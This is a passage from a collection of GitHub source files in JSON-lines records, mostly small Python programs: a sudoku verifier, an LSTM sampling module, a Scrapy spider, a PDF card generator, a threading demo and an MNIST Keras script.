NINE).all():\n logging.debug(f'Row nr. {r} PASSED the verification!')\n else:\n logging.debug(f'Row nr. {r} FAILED the verification!')\n return False\n \n # verify the columns\n for c in range(9):\n logging.info(f'Verifying column nr. {c}: {grid_arr[:, c]}')\n if (np.sort(grid_arr[:, c]) == NINE).all():\n logging.debug(f'Column nr. {c} PASSED the verification!')\n else:\n logging.debug(f'Column nr. {c} FAILED the verification!')\n return False\n \n # verify the small squares\n ss_list = split_the_grid_in_small_squares(grid_arr)\n \n for nr_ss in range(9):\n logging.info(f'Verifying small square nr. {nr_ss}: \\n{ss_list[nr_ss]}')\n ss = ss_list[nr_ss]\n ss_flat = ss.flatten()\n if (np.sort(ss_flat) == NINE).all():\n logging.debug(f'Small square nr. {nr_ss} PASSED the verification!')\n else:\n logging.debug(f'Small square nr. 
{nr_ss} FAILED the verification!')\n return False\n \n return True\n\nmy_list = [[3, 7, 1, 6, 8, 4, 9, 5, 2],\n [8, 4, 9, 7, 2, 5, 3, 6, 1],\n [5, 6, 2, 9, 3, 1, 4, 7, 8],\n [6, 8, 7, 2, 1, 9, 5, 3, 4],\n [9, 1, 4, 3, 5, 7, 2, 8, 6],\n [2, 5, 3, 8, 4, 6, 1, 9, 7],\n [1, 3, 6, 5, 7, 2, 8, 4, 9],\n [4, 9, 8, 1, 6, 3, 7, 2, 5],\n [7, 2, 5, 4, 9, 8, 6, 1, 3]]\n\n\ngrid_arr = np.array(my_list)\n\nresult = verify_solution(grid_arr)\n\nif result:\n logging.debug(f'The result of the verification: TRUE, the grid is SUDOKU!')\n print(f'The result of the verification: TRUE, the grid is SUDOKU!')\nelse:\n logging.debug(f'The result of the verification: FALSE, the grid is NOT SUDOKU!')\n print(f'The result of the verification: FALSE, the grid is NOT SUDOKU!')\n","repo_name":"H0r4c3/Python_00_ALL","sub_path":"numpy/Apps/verify_sudoku.py","file_name":"verify_sudoku.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"21175513999","text":"# A simple example to show inheritance in Python\n\nfrom typing import Dict\n\nglobalPublicationMap:Dict[int,str] = {\n 1: \"Apress\",\n 2: \"Orily\"\n}\n\nclass Publication:\n def __init__(self, pubID:int, title:str ) -> None:\n self.publisherID = pubID\n self.title = title\n\n def __str__(self) -> str:\n stringRep:str = self.title\n stringRep += \" by \"\n stringRep += globalPublicationMap[self.publisherID]\n\n # This is what would be dispayed in the cosole\n return stringRep\n\n# Passing the base class name in () in the class declaration\n# followed by calling super() method\nclass HardCopy(Publication):\n def __init__(self, pubID: int, title: str, store:str) -> None:\n super().__init__(pubID, title)\n self.physicalStore = store\n\nclass SoftCopy(Publication):\n def __init__(self, pubID: int, title: str, url:str) -> None:\n super().__init__(pubID, title)\n self.downloadLink = \"AWS://\" + url\n\ncppBook = HardCopy(1,\"Introduction to C++\",\"BLR\")\nprint(cppBook)\n\nopenGLBook = SoftCopy(2, \"OpenGL Stuff\", \"amazon.com/abcd\")\nprint(openGLBook)\n","repo_name":"debojyoti-majumder/HobbyProjects","sub_path":"pyBasicApp1/langfeatures/inherit.py","file_name":"inherit.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20688559435","text":"import torch\r\nimport torch.nn as nn\r\n\r\n\r\nclass LSTM_NodeLinWeightsDistribution(nn.Module):\r\n \"\"\"\r\n Linear structural equation autoregressive weights distribution for a node given its parents using an LSTM\r\n \"\"\"\r\n def __init__(self, n_weights, hidden_dim=48, n_layers=3):\r\n \"\"\"\r\n Initialise distribution\r\n :param n_weights: number of weights to be modelled by the distribution. 
It needs to be equivalent to the number\r\n of nodes in the graph.\r\n :param hidden_dim: LSTM input, hidden and cell states dimension\r\n :param n_layers: number of layers in the LSTM\r\n \"\"\"\r\n super().__init__()\r\n self.n_weights = n_weights\r\n self.hidden_dim = hidden_dim\r\n self.n_layers = n_layers\r\n\r\n self.rnn = nn.LSTM(self.hidden_dim, self.hidden_dim, num_layers=n_layers, batch_first=True)\r\n # Project the output of the LSTM into a mean\r\n self.proj_mean = nn.Linear(self.hidden_dim, 1)\r\n # Embed the input of the LSTM into a vector\r\n self.embed_input = nn.Linear(1, self.hidden_dim)\r\n # Embed an adjacency entry into a vector\r\n self.embed_adj = nn.Linear(self.n_weights, self.hidden_dim)\r\n # Initialise the initial hidden state. It will be updated when using back-propagation\r\n self.h0 = nn.Parameter(1e-3 * torch.randn(1, self.n_layers, self.hidden_dim))\r\n # Initialise the initial cell state. It will be updated when using back-propagation\r\n self.c0 = nn.Parameter(1e-3 * torch.randn(1, self.n_layers, self.hidden_dim))\r\n # Initialise variable for the initial input of the LSTM. It will be updated when using back-propagation\r\n self._init_input_param = nn.Parameter(torch.zeros(1, 1, 1))\r\n\r\n def forward(self, adj, reparametrized=True, return_norm_params=False, start_state=None, init_input=None):\r\n \"\"\"\r\n Sample a batch of weight vectors given a batch of adjacency entries, where these entries\r\n denote whether a given node is a parent\r\n :param adj: batch of adjacency entries\r\n :param reparametrized: if False, every element of the weight vectors is sampled using a Normal distribution.\r\n Sampling from the Normal distribution is not differentiable, though. If\r\n True, every element of the weight vectors is sampled using the Normal distribution\r\n reparameterization trick. 
Thus, this operation is differentiable.\r\n :param return_norm_params: if True, the Normal distribution parameters are returned as well\r\n :param start_state: initial state of the LSTM from which starting sampling\r\n :param init_input: initial input of the LSTM from which starting sampling\r\n :return: weight vector samples or weight vectors samples, Normal distribution parameters\r\n \"\"\"\r\n samples, means, stds = self._sample(adj, reparametrized=reparametrized, start_state=start_state,\r\n init_input=init_input)\r\n if return_norm_params:\r\n return samples, means, stds\r\n else:\r\n return samples\r\n\r\n def _compute_norm_params(self, adj, inputs, state):\r\n \"\"\"\r\n Compute batch of means, stds and states by feeding a batch of adjacency entries, inputs and initial states to\r\n the LSTM\r\n :param adj: batch of adjacency entries\r\n :param inputs: batch of inputs to the LSTM\r\n :param state: batch of initial states of the LSTM\r\n :return: batch of means, stds, output states\r\n \"\"\"\r\n # adj size = (B,T) where B=batch size, T=self.n_weights\r\n # input size = (B,L,1) where B=batch size, L=sequence length,\r\n # state = tuple where both elements have size (B,Q,H) where B=batch size, Q=self.n_layers, H=self.hidden_dim\r\n inputs = self.embed_input(inputs)\r\n # inputs size = (B,L,H) where B=batch size, L=sequence length, H=self.hidden_dim\r\n adj = self.embed_adj(adj)\r\n # adj size = (B,H) where B=batch size, H=self.hidden_dim\r\n adj = adj.unsqueeze(1)\r\n # adj size = (B,1,H) where B=batch size, H=self.hidden_dim\r\n inputs = inputs * adj\r\n # inputs size = (B,L,H)\r\n out, state = self.rnn(inputs, self._t(state))\r\n # out size = (B,L,H) where B=batch size, L=sequence length, H=self.hidden_dim\r\n # state = tuple where both elements have size (Q,B,H) where Q=self.n_layers, B=batch size, H=self.hidden_dim\r\n state = self._t(state)\r\n # state = tuple where both elements have size (B,Q,H) where B=batch size, Q=self.n_layers, H=self.hidden_dim\r\n means = self.proj_mean(out)\r\n # means size = (B,L,1) where B=batch size, L=sequence length\r\n stds = torch.ones_like(means)\r\n # stds size = (B,L,1) where B=batch size, L=sequence length\r\n return means, stds, state\r\n\r\n def sample(self, adj, return_norm_params=False, start_state=None, init_input=None):\r\n \"\"\"\r\n Sample a batch of weight vectors given a batch of adjacency entries, where these entries\r\n denote whether a given node is a parent, using the Normal distribution.\r\n :param adj: batch of adjacency entries\r\n :param return_norm_params: if True, the Normal distribution parameters are returned as well\r\n :param start_state: initial state of the LSTM from which starting sampling\r\n :param init_input: initial input of the LSTM from which starting sampling\r\n :return: weight vector samples or weight vectors samples, Normal distribution parameters\r\n \"\"\"\r\n samples, means, stds = self._sample(adj, start_state=start_state, init_input=init_input)\r\n if return_norm_params:\r\n return samples, means, stds\r\n else:\r\n return samples\r\n\r\n def rsample(self, adj, return_norm_params=False, start_state=None, init_input=None):\r\n \"\"\"\r\n Sample a batch of weight vectors given a batch of adjacency entries, where these entries\r\n denote whether a given node is a parent, using the Normal distribution reparameterization trick.\r\n :param adj: batch of adjacency entries\r\n :param return_norm_params: if True, the Normal distribution parameters are returned as well\r\n :param start_state: initial state of 
the LSTM from which starting sampling\r\n :param init_input: initial input of the LSTM from which starting sampling\r\n :return: weight vector samples or weight vectors samples, Normal distribution parameters\r\n \"\"\"\r\n samples, means, stds = self._sample(adj, reparametrized=True, start_state=start_state,\r\n init_input=init_input)\r\n if return_norm_params:\r\n return samples, means, stds\r\n else:\r\n return samples\r\n\r\n def _sample(self, adj, reparametrized=False, start_state=None, init_input=None):\r\n \"\"\"\r\n Sample a batch of weight vectors given a batch of adjacency entries, where these entries\r\n denote whether a given node is a parent.\r\n :param adj: batch of adjacency entries\r\n :param reparametrized: if False, every element of the weight vectors is sampled using a Normal distribution.\r\n Sampling from the Normal distribution is not differentiable, though. If\r\n True, every element of the weight vectors is sampled using the Normal distribution\r\n reparameterization trick. Thus, this operation is differentiable.\r\n :param start_state: initial state of the LSTM from which starting sampling\r\n :param init_input: initial input of the LSTM from which starting sampling\r\n :return: weight vectors samples, means and stds\r\n \"\"\"\r\n assert adj.shape[1] == self.n_weights\r\n # adj size = (B,T) where B=batch size, T=self.n_weights\r\n if start_state is None:\r\n state = self._get_state(adj.shape[0]) # hidden / cell state at t=0\r\n else:\r\n state = start_state\r\n if init_input is None:\r\n input = self._get_init_input(adj.shape[0]) # input at t=0\r\n else:\r\n input = init_input\r\n\r\n # state = tuple where both elements have size (B,Q,H) where B=batch size, Q=self.n_layers, H=self.hidden_dim\r\n # input size = (B,1,1) where B=batch size\r\n\r\n sampled_tokens = []\r\n state_array_1 = []\r\n state_array_2 = []\r\n means_array = []\r\n stds_array = []\r\n\r\n for t in range(self.n_weights):\r\n means, stds, state = self._compute_norm_params(adj, input, state)\r\n # means size = (B,1,1) where B=batch size\r\n # stds size = (B,1,1) where B=batch size\r\n # state = tuple where both elements have size (B,Q,H) where B=batch size, Q=self.n_layers, H=self.hidden_dim\r\n if reparametrized:\r\n _sample = torch.distributions.normal.Normal(means, stds).rsample().unsqueeze(2)\r\n # _sample size = (B,1,1) where B=batch size\r\n else:\r\n _sample = torch.distributions.normal.Normal(means, stds).sample().unsqueeze(2)\r\n # _sample size = (B,1,1) where B=batch size\r\n adj_col = adj[:, t].unsqueeze(2)\r\n # adj_col size = (B,1,1) where B=batch size\r\n _sample = _sample * adj_col\r\n # _sample size = (B,1,1) where B=batch size\r\n means = means * adj_col\r\n # means size = (B,1,1) where B=batch size\r\n stds = stds * adj_col\r\n # stds size = (B,1,1) where B=batch size\r\n input = _sample\r\n sampled_tokens.append(_sample)\r\n state_array_1.append(state[0])\r\n state_array_2.append(state[1])\r\n means_array.append(means)\r\n stds_array.append(stds)\r\n\r\n samples = torch.cat(sampled_tokens, dim=1)\r\n # samples size = (B,T,1) where B=batch size, T=self.n_weights\r\n samples = samples.squeeze(2)\r\n # samples size = (B,T) where B=batch size, T=self.n_weights\r\n states = [torch.stack(state_array_1, dim=1), torch.stack(state_array_2, dim=1)]\r\n # states = tuple where both elements have size (B,T,Q,H) where B=batch size, T=self.n_dim_out, Q=self.n_layers,\r\n # H=self.hidden_dim\r\n means = torch.cat(means_array, dim=1)\r\n # means size = (B,T,1) where B=batch size, 
T=self.n_weights\r\n means = means.squeeze(2)\r\n # means size = (B,T) where B=batch size, T=self.n_weights\r\n stds = torch.cat(stds_array, dim=1)\r\n # stds size = (B,T,1) where B=batch size, T=self.n_weights\r\n stds = stds.squeeze(2)\r\n # stds size = (B,T) where B=batch size, T=self.n_weights\r\n return samples, means, stds\r\n\r\n def _get_state(self, batch_size=1):\r\n \"\"\"\r\n Get a batch of initial states. The initial state is just repeated n times where n is the batch size value.\r\n :param batch_size: batch size\r\n :return: batch of initial states\r\n \"\"\"\r\n return self.h0.repeat(batch_size, 1, 1), self.c0.repeat(batch_size, 1, 1)\r\n\r\n def _get_init_input(self, batch_size):\r\n \"\"\"\r\n Get a batch of the initial input. The initial input is just repeated n times where n is the batch size value.\r\n :param batch_size: batch size\r\n :return: batch of the initial input\r\n \"\"\"\r\n return self._init_input_param.expand(batch_size, 1, 1)\r\n\r\n @staticmethod\r\n def _t(a):\r\n return [t.transpose(0, 1).contiguous() for t in a]","repo_name":"albertotamajo/Causal-Reasoning-Research-Internship","sub_path":"CausalDiscovery/experiments/trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":11637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37215284420","text":"\nimport Constants\nimport threading\nimport json\nfrom communication.ServerController import ServerController\nfrom communication.Broker import Broker\nfrom session.Session import Session\n\nclass SessionManager(threading.Thread):\n\n verbose = True\n server = None\n broker = None\n sessions = dict()\n\n def __init__(self, verbose=True):\n super().__init__()\n self.verbose = verbose\n self.server = ServerController(\"tcp://localhost:\" + Constants.port, \"session-manager\", verbose)\n self.broker = Broker(verbose)\n self.broker.start()\n\n def run(self):\n while Constants.stop is not True:\n request = self.server.recv()\n if request is None:\n break # Worker was interrupted\n self.process(request)\n self.destroy()\n\n def process(self, request):\n request_data = json.loads(str(request[2], \"UTF-8\"))\n session_id = request_data[\"sessionId\"]\n if request_data[\"requestType\"] == \"REQUEST_CONNECT\":\n self.create_session(session_id, request)\n elif request_data[\"requestType\"] == \"REQUEST_DISCONNECT\":\n self.destroy_session(session_id, request)\n elif request_data[\"requestType\"] == \"REQUEST_CLOSE\":\n self.close()\n\n def create_session(self, session_id, reply):\n print('create session: %s' % session_id)\n session = Session(session_id, self.verbose)\n self.sessions[session_id] = session\n session.start()\n reply[2] = bytes(str(reply[2], \"UTF-8\").replace(\"REQUEST_CONNECT\", \"SESSION_INITIATED\"), \"UTF-8\")\n self.server.send(reply)\n\n\n def destroy_session(self, session_id, reply):\n print('destroy session: %s' % session_id)\n session = self.sessions.pop(session_id)\n session.destroy_session()\n reply[2] = bytes(str(reply[2], \"UTF-8\").replace(\"REQUEST_DISCONNECT\", \"SESSION_CLOSED\"), \"UTF-8\")\n self.server.send(reply)\n\n def close(self):\n print('closing Session Manager...')\n Constants.stop = True\n\n def destroy(self):\n for k, v in self.sessions.items():\n v.destroy_session()\n self.sessions.clear()\n 
self.server.destroy()\n\n","repo_name":"ojrlopez27/multiuser-framework","sub_path":"Examples/PythonDM/session/SessionManager.py","file_name":"SessionManager.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"19276102132","text":"n = int(input())\n\n\ndef even():\n i = 0\n while True:\n yield i\n i += 2\n\n\n# Don't forget to print out the first n numbers one by one here\nnew_generator = even()\nfor _ in range(n):\n print(next(new_generator))\n","repo_name":"TonyNewbie/PaswordHacker","sub_path":"Problems/Even numbers/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1066884369","text":"from mpl_toolkits.mplot3d import Axes3D\nimport matplotlib as mpl\nfrom matplotlib import cm\nmpl.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy\nimport numpy as np\n\n\ndef ackley_function(x):\n\t\"given a vector x, output the ackley function\"\n\ty = 20 + numpy.exp(1)\n\ty = y - 20 * numpy.exp((-1. / 5) * numpy.sqrt(numpy.mean(numpy.square(x))))\n\tcos = [numpy.cos(2 * numpy.pi * xi) for xi in x]\n\tcos = numpy.mean(cos)\n\ty = y - cos\n\treturn y\n\n\ndef x2(x):\n\treturn numpy.linalg.norm(x)\n\n\ndef ackley_function_get_batch(batch_size=256, num_dims=2):\n\t\"given a batch size and dimension size, return a batch of x,y sampled from ackley\"\n\tx_batch = numpy.random.uniform(low=-5, high=5, size=num_dims * batch_size)\n\tx_batch = x_batch.reshape(batch_size, num_dims)\n\ty_batch = [ackley_function(x) for x in x_batch]\n\ty_batch = numpy.array(y_batch).reshape(batch_size, 1)\n\treturn x_batch, y_batch\n\n\nif __name__ == \"__main__\":\n\tX = np.arange(-5, 5, 0.5)\n\tY = np.arange(-5, 5, 0.5)\n\tX, Y = np.meshgrid(X, Y)\n\tZ = numpy.zeros_like(X)\n\n\tfor x_index in range(len(X)):\n\t\tfor y_index in range(len(X)):\n\t\t\tarr = numpy.array([X[x_index, y_index], Y[x_index, y_index]])\n\t\t\tZ[x_index, y_index] = ackley_function(arr)\n\n\tfig = plt.figure()\n\tax = fig.gca(projection='3d')\n\n\t# Plot the surface.\n\tsurf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm, linewidth=0, antialiased=True)\n\n\t# Customize the z axis.\n\t#ax.set_zlim(-1.01, 1.01)\n\n\t# Add a color bar which maps values to colors.\n\tfig.colorbar(surf, shrink=0.5, aspect=5)\n\n\tplt.show()\n","repo_name":"kavosh8/RBFDQN_pytorch","sub_path":"bandit/ackley_problem.py","file_name":"ackley_problem.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"32"} +{"seq_id":"8127962028","text":"from typing import Counter\nimport sys\nfrom reportlab.pdfgen import canvas\nfrom reportlab.rl_config import defaultPageSize\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\n\n# for \nimport csv\n\n# Import vertical text class\nfrom rotatedtext import verticalText\n\nwidth = 5\nheight = 3\nfont_size = 26\nfont = 'Ace'\ncard_spacing = 0\nspacing = 12 # smaller is a bigger space when multi-line\nadjuster = 1.55 # spacing for 180 rotations\n\n# get arguments\nif len(sys.argv) == 2:\n font_size = int(sys.argv[1])\n\n# Read in the CSV\ndef get_file(file):\n names = []\n with open(file) as csvfile:\n reader = csv.reader(csvfile, delimiter='\\n')\n for row in reader:\n names.append(row)\n if len(names) % 2 != 0:\n names.append([\"\"])\n return names\n\n\ndef return_array(num, div):\n counter = 
0\n div_list = []\n gap = num / div\n while len(div_list) < div:\n counter = counter + gap\n div_list.append(counter)\n return div_list\n\ndef setCan(canvas):\n canvas.setFont(font, font_size)\n canvas.setLineWidth(.0002)\n\n\ndef generate_pdf(uploaded_file):\n names = get_file(uploaded_file)\n can = canvas.Canvas('cards.pdf', bottomup = False)\n pdfmetrics.registerFont(TTFont('Ace', 'ace.ttf'))\n setCan(can)\n PAGE_WIDTH = defaultPageSize[0]\n PAGE_HEIGHT = defaultPageSize[1]\n\n width_array = return_array(PAGE_HEIGHT, width)\n #height_array = return_array(PAGE_WIDTH, height)\n height_array = [PAGE_WIDTH/4, 3 * (PAGE_WIDTH/4)]\n\n width_line = return_array(PAGE_HEIGHT, width*4)\n width_line = width_line[::2]\n height_line = return_array(PAGE_WIDTH, height*2)\n #height_line = height_line[::2]\n\n\n def drawLine(can):\n # Draw grid lines\n # center line\n can.line(PAGE_WIDTH/2, 0, PAGE_WIDTH/2, PAGE_HEIGHT)\n for lines_w in width_line:\n for lines_h in height_line:\n # horizontal lines\n can.line(0, lines_w - font_size/4, PAGE_WIDTH, lines_w - font_size/4)\n # vertical lines\n # can.line(lines_h, 0, lines_h, PAGE_HEIGHT)\n\n\n x_counter = 0\n y_counter = 0\n drawLine(can)\n\n # Print Content\n for text in names:\n if x_counter == width - 1:\n y_counter = y_counter + 1\n x_counter = 0\n if y_counter == height - 1:\n can.showPage()\n setCan(can)\n drawLine(can)\n y_counter = 0\n if can.stringWidth(text[0]) > PAGE_WIDTH/2 - 40:\n text_array = text[0].split(\" \", 1)\n if can.stringWidth(text_array[1]) > PAGE_WIDTH/2 - 40:\n can.setFont(font, font_size/1.2)\n\n can.drawString(height_array[y_counter] - can.stringWidth(text_array[0])/2, width_array[x_counter] - width_array[0]/spacing, text_array[0])\n can.drawString(height_array[y_counter] - can.stringWidth(text_array[1])/2, width_array[x_counter] + width_array[0]/spacing, text_array[1])\n can.saveState()\n can.rotate(180)\n can.drawString(-height_array[y_counter] - can.stringWidth(text_array[1])/2, -width_array[x_counter] + height_array[0]/adjuster + width_array[0]/spacing, text_array[1])\n can.drawString(-height_array[y_counter] - can.stringWidth(text_array[0])/2, -width_array[x_counter] + height_array[0]/adjuster - width_array[0]/spacing, text_array[0])\n can.restoreState()\n setCan(can)\n else:\n can.drawString(height_array[y_counter] - can.stringWidth(text[0])/2, width_array[x_counter], text[0])\n can.saveState()\n can.rotate(180)\n can.drawString(-height_array[y_counter] - can.stringWidth(text[0])/2, -width_array[x_counter] + height_array[0]/adjuster, text[0])\n can.restoreState()\n x_counter = x_counter + 1\n\n # Add a page of lines, then save\n can.save()\n\n","repo_name":"smitty001/name_cards","sub_path":"generator/placecardsv2.py","file_name":"placecardsv2.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20534839387","text":"import os\nfrom itertools import izip_longest\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request, HtmlResponse\nfrom scrapy.utils.url import urljoin_rfc\nfrom scrapy.utils.response import get_base_url\n\nfrom product_spiders.items import Product\nfrom axemusic_item import ProductLoader\n\n\nclass AcclaimMusicSpider(BaseSpider):\n name = 'acclaim-music.com'\n allowed_domains = ['acclaim-music.com']\n start_urls = ['http://www.acclaim-music.com/search.php?mode=search&page=1']\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n 
products = hxs.select('//ul[@id=\"search-results\"]/li/span[@class=\"wrapper\"]')\n\n for product in products:\n loader = ProductLoader(item=Product(), response=response)\n loader.add_value('name', product.select('.//span[@class=\"product-title\"]/a/text()').extract()[0])\n url = product.select('.//span[@class=\"product-title\"]/a/@href').extract()[0]\n loader.add_value('url', url)\n try:\n loader.add_value('price', product.select('.//span[@class=\"product-ourprice\"]/text()').extract()[0])\n except IndexError:\n loader.add_value('price', 0)\n yield Request(url, callback=self.parse_product, meta={'loader': loader})\n pages = hxs.select('//div[contains(@class, \"nav-pages\")][1]//a/@href').extract()\n if pages:\n url = urljoin_rfc(get_base_url(response), pages[-1])\n yield Request(url, callback=self.parse)\n\n def parse_product(self, response):\n hxs = HtmlXPathSelector(response)\n loader = response.meta.get('loader')\n\n try:\n brand = hxs.select('//div[@id=\"location\"]/span/a[@class=\"bread-crumb\"]/span/text()').extract()[-2]\n except:\n brand = None\n try:\n category = hxs.select('//div[@id=\"location\"]/span/a[@class=\"bread-crumb\"]/span/text()').extract()[-1]\n except:\n category = None\n image_url = hxs.select('//div[@class=\"image-box\"]/img/@src').extract()\n identifier = hxs.select('//input[@name=\"productid\"]/@value').extract()[0]\n sku = hxs.select('//tr[td/text()=\"Model #\"]/td[not(text()=\"Model #\")]/text()').extract()\n if not sku:\n sku = hxs.select('//tr[td/text()=\"Model\"]/td[not(text()=\"Model\")]/text()').extract()\n if sku:\n loader.add_value('sku', sku[0].strip())\n loader.add_value('category', category.replace(' - ' + brand, '') if brand else category)\n loader.add_value('identifier', identifier)\n if brand:\n loader.add_value('brand', brand)\n loader.add_value('image_url', image_url)\n yield loader.load_item()\n\n\n\n def _grouper(self, n, iterable, fillvalue=None):\n '''\n grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx\n '''\n args = [iter(iterable)] * n\n return izip_longest(fillvalue=fillvalue, *args)\n","repo_name":"Godsoo/scraping","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/axemusic/acclaimmusic_spider.py","file_name":"acclaimmusic_spider.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26786275469","text":"\n\ndef transform(current, target, grid):\n\n if target%2 == 0: \n \n height = len(grid)\n width = len(grid[0])\n\n strap = ['O'] * width\n res = []\n for _ in range(height):\n res.append(''.join(strap))\n\n return res\n\n else: \n if current+1 == target or current == target:\n return grid\n else: \n return transform(current+2, target, step(grid))\n\n\ndef step(grid):\n\n height = len(grid)\n width = len(grid[0])\n\n res = []\n for i in range(height):\n strap = []\n\n for j in range(width):\n\n left_cell = checlleftCellFor(i,j,grid)\n right_cell = checkRightCellFor(i,j,grid)\n top_cell = checkTopCellFor(i,j,grid)\n bottom_cell = checkBottomCellFor(i,j,grid)\n self_cell = checkSelf(i,j,grid)\n\n if left_cell or right_cell or top_cell or bottom_cell or self_cell:\n strap.append('.')\n else:\n strap.append('O') \n\n res.append(''.join(strap))\n\n return res\n\n\ndef checkTopCellFor(i, j, grid):\n\n if i == 0:\n return False\n elif ord(grid[i-1][j]) == 79:\n return True\n else :\n return False\n\ndef checlleftCellFor(i, j, grid):\n\n if j == 0:\n return False\n elif ord(grid[i][j-1]) == 79:\n return True\n else :\n return False\n\ndef 
checkRightCellFor(i, j, grid):\n\n width = len(grid[0])\n\n if j == width-1:\n return False\n elif ord(grid[i][j+1]) == 79:\n return True\n else :\n return False\n\ndef checkBottomCellFor(i, j, grid):\n\n height = len(grid)\n\n if i == height-1:\n return False\n elif ord(grid[i+1][j]) == 79:\n return True\n else :\n return False\n\ndef checkSelf(i, j, grid):\n\n if ord(grid[i][j]) == 79:\n return True\n else :\n return False\n\ndef bomberMan(n, grid):\n x = n%4 \n if x == 1 and n>1: \n x += 4\n return transform(1, x, grid)\n\n\ngrid= ['O..OO........O..O........OO.O.OO.OO...O.....OOO...OO.O..OOOOO...O.O..O..O.O..OOO..O..O..O....O...O....O...O..O..O....O.O.O.O.....O.....OOOO..O......O.O.....OOO....OO....OO....O.O...O..OO....OO..O...O']\nprint(bomberMan(19, grid))\n","repo_name":"AmitabhaSaha/HackerRankSolutions","sub_path":"Bomberman.py","file_name":"Bomberman.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1702377860","text":"# Threading模块\n\nimport threading # 多线程 threading模块\nimport time\n\n############ 传统方式 单线程 ############\n# def coding():\n# for x in range(3):\n# print('正在写代码%s'%x)\n# time.sleep(1)\n#\n# def drawing():\n# for x in range(3):\n# print('正在画图%s'%x)\n# time.sleep(1)\n#\n# def main():\n# coding()\n# drawing()\n#\n# if __name__ == '__main__':\n# main()\n\n\n############ 采用多线程 ############\n\ndef coding():\n for x in range(3):\n print('正在写代码%s' %threading.current_thread())\n # threading.current_thread()是当前线程的名称\n time.sleep(1)\n\ndef drawing():\n for x in range(3):\n print('正在画图%s' %threading.current_thread())\n time.sleep(1)\n\ndef main():\n t1 = threading.Thread(target=coding)\n t2 = threading.Thread(target=drawing)\n\n t1.start()\n t2.start()\n\n print(threading.enumerate()) # threading.enumerate()函数查看线程数\n\nif __name__ == '__main__':\n main()","repo_name":"Mocha-Pudding/Scrapy-Redis_Demos","sub_path":"Thread_demo/demo1.py","file_name":"demo1.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"38177927994","text":"from collections import deque\nfrom typing import List\n\n\nclass Solution:\n def updateMatrix(self, mat: List[List[int]]) -> List[List[int]]:\n m = len(mat)\n n = len(mat[0])\n\n max_path_len = m * n\n\n d = deque()\n\n for i in range(m):\n for j in range(n):\n if mat[i][j] == 0:\n d.append((i, j))\n else:\n mat[i][j] = max_path_len\n\n while d:\n i, j = d.popleft()\n for dx, dy in ((-1, 0), (1, 0), (0, -1), (0, 1)):\n ii, jj = i + dx, j + dy\n if ii < 0 or ii >= m or jj < 0 or jj >= n:\n continue\n if mat[ii][jj] > mat[i][j] + 1:\n mat[ii][jj] = mat[i][j] + 1\n d.append((ii, jj))\n\n return mat\n\n\nprint(Solution().updateMatrix([[0, 0, 0], [0, 1, 0], [1, 1, 1]]))\n","repo_name":"blockinhead/algo_python","sub_path":"leetcode/542_01_matrix.py","file_name":"542_01_matrix.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38936884598","text":"import random\n\nVOWELS = \"aeiou\"\nCONSONANTS = \"bcdfghjklmnpqrstvwxyz\"\nword_format = \"%#*\"\nwords = \"\"\n\nletter_random = random.choice(word_format)\n\n\ndef main():\n print(is_valid_format(words))\n\n\ndef is_valid_format(words):\n for kind in letter_random.lower():\n if kind == \"%\" or \"*\":\n words += random.choice(CONSONANTS)\n return words\n elif kind == \"#\":\n words += random.choice(VOWELS)\n 
return words\n else:\n words += words\n return words\n\n\nmain()\n","repo_name":"imnkywf/CP1404praticals","sub_path":"Prac_03/word_generator.py","file_name":"word_generator.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15782066504","text":"import cv2 as cv\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\n\r\nmnist = tf.keras.datasets.mnist #we already know the flassifications of all these digits\r\n(x_train, y_train), (x_test, y_test) = mnist.load_data() #this load data function loads the mnist data and already splits it into training and testing data.\r\n#it uses a 20% or a 10% split, but most of the data is contained in the training data and we use a couple of the examples in order to validate to evaluate them all\r\n\r\nx_train = tf.keras.utils.normalize(x_train, axis=1)\r\nx_test = tf.keras.utils.normalize(x_test, axis=1)\r\n\r\n#create a new model\r\nmodel = tf.keras.models.Sequential() #basically saying that we create an ordinary feedforward neural network\r\n\r\n#build the model\r\n\r\n#add some layers\r\nmodel.add(tf.keras.layers.Flatten(input_shape=(28,28))) #flatten the layer with all the pixels off each individual image of a handwritten digit and we feed that into the input layer and then this input layer is followed by a dense layer\r\n#add the dense layer\r\nmodel.add(tf.keras.layers.Dense(units=128, 